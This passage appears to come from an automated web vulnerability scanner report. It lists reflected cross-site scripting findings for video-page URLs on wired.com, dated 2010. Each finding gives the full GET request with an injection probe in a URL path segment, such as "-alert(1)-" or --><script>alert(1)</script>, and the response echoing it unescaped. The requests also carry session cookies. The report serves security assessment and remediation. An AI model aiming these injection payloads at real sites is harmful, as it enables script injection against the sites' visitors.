Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29435
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:02 GMT
Date: Mon, 22 Nov 2010 00:42:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video15f7a"><a>14ac02a74d2 ss_latest-videos c_highlights">
...[SNIP]...

1.1002. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a284"><a>89e42bb26a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos1a284"><a>89e42bb26a2/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=294
Expires: Mon, 22 Nov 2010 00:47:50 GMT
Date: Mon, 22 Nov 2010 00:42:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos1a284"><a>89e42bb26a2 c_highlights">
...[SNIP]...

1.1003. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb0b5"-alert(1)-"46c49765a4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videosfb0b5"-alert(1)-"46c49765a4b/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:04 GMT
Date: Mon, 22 Nov 2010 00:44:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videosfb0b5"-alert(1)-"46c49765a4b","green-lantern-theatrical-trailer","680254055001","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1004. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50103"-alert(1)-"8e2c93350c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights50103"-alert(1)-"8e2c93350c0/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:07 GMT
Date: Mon, 22 Nov 2010 00:45:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "highlights50103"-alert(1)-"8e2c93350c0","green-lantern-theatrical-trailer","latest-videos","680254055001","1716440574","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1005. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d852"><a>c1b1288d9c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlights2d852"><a>c1b1288d9c5/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:18 GMT
Date: Mon, 22 Nov 2010 00:44:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlights2d852"><a>c1b1288d9c5">
...[SNIP]...

1.1006. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a337e"-alert(1)-"f1cf29d2aaf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574a337e"-alert(1)-"f1cf29d2aaf/green-lantern-theatrical-trailer/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=297
Expires: Mon, 22 Nov 2010 00:50:23 GMT
Date: Mon, 22 Nov 2010 00:45:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
ipt type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "green-lantern-theatrical-trailer","latest-videos","680254055001","highlights","video","1716440574a337e"-alert(1)-"f1cf29d2aaf"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1007. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2660b"-alert(1)-"2b0abda2f1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer2660b"-alert(1)-"2b0abda2f1/680254055001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:51 GMT
Date: Mon, 22 Nov 2010 00:45:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "green-lantern-theatrical-trailer2660b"-alert(1)-"2b0abda2f1","latest-videos","680254055001","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1008. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90ca1"-alert(1)-"587a42270 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/68025405500190ca1"-alert(1)-"587a42270 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=297
Expires: Mon, 22 Nov 2010 00:51:13 GMT
Date: Mon, 22 Nov 2010 00:46:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106765


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "green-lantern-theatrical-trailer","latest-videos","1716440574","68025405500190ca1"-alert(1)-"587a42270","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1009. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6288f--><script>alert(1)</script>4d7dc58b639 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video6288f--><script>alert(1)</script>4d7dc58b639/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29488
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:27 GMT
Date: Mon, 22 Nov 2010 00:45:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video6288f--><script>alert(1)</script>4d7dc58b639/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001
-->
...[SNIP]...

1.1010. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7fce"><a>4c58c684623 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoa7fce"><a>4c58c684623/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29453
Vary: Accept-Encoding
Cache-Control: max-age=298
Expires: Mon, 22 Nov 2010 00:49:43 GMT
Date: Mon, 22 Nov 2010 00:44:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoa7fce"><a>4c58c684623 ss_latest-videos c_highlights">
...[SNIP]...

1.1011. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 877c6"><a>f389d0665 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos877c6"><a>f389d0665/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=294
Expires: Mon, 22 Nov 2010 00:50:23 GMT
Date: Mon, 22 Nov 2010 00:45:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos877c6"><a>f389d0665 c_highlights">
...[SNIP]...

1.1012. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d588"-alert(1)-"05979854152 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos9d588"-alert(1)-"05979854152/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=283
Expires: Mon, 22 Nov 2010 00:51:14 GMT
Date: Mon, 22 Nov 2010 00:46:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106742


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos9d588"-alert(1)-"05979854152","672339556001","1716440574","highlights","video","noire-thriller-set-in-seedy-los-angeles-of-the-40s"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1013. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23cf8"><a>abe91b1c201 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlights23cf8"><a>abe91b1c201/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=298
Expires: Mon, 22 Nov 2010 00:51:31 GMT
Date: Mon, 22 Nov 2010 00:46:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlights23cf8"><a>abe91b1c201">
...[SNIP]...

1.1014. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9abc"-alert(1)-"7723227df32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlightsd9abc"-alert(1)-"7723227df32/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:43 GMT
Date: Mon, 22 Nov 2010 00:47:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "highlightsd9abc"-alert(1)-"7723227df32","latest-videos","672339556001","1716440574","video","noire-thriller-set-in-seedy-los-angeles-of-the-40s"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

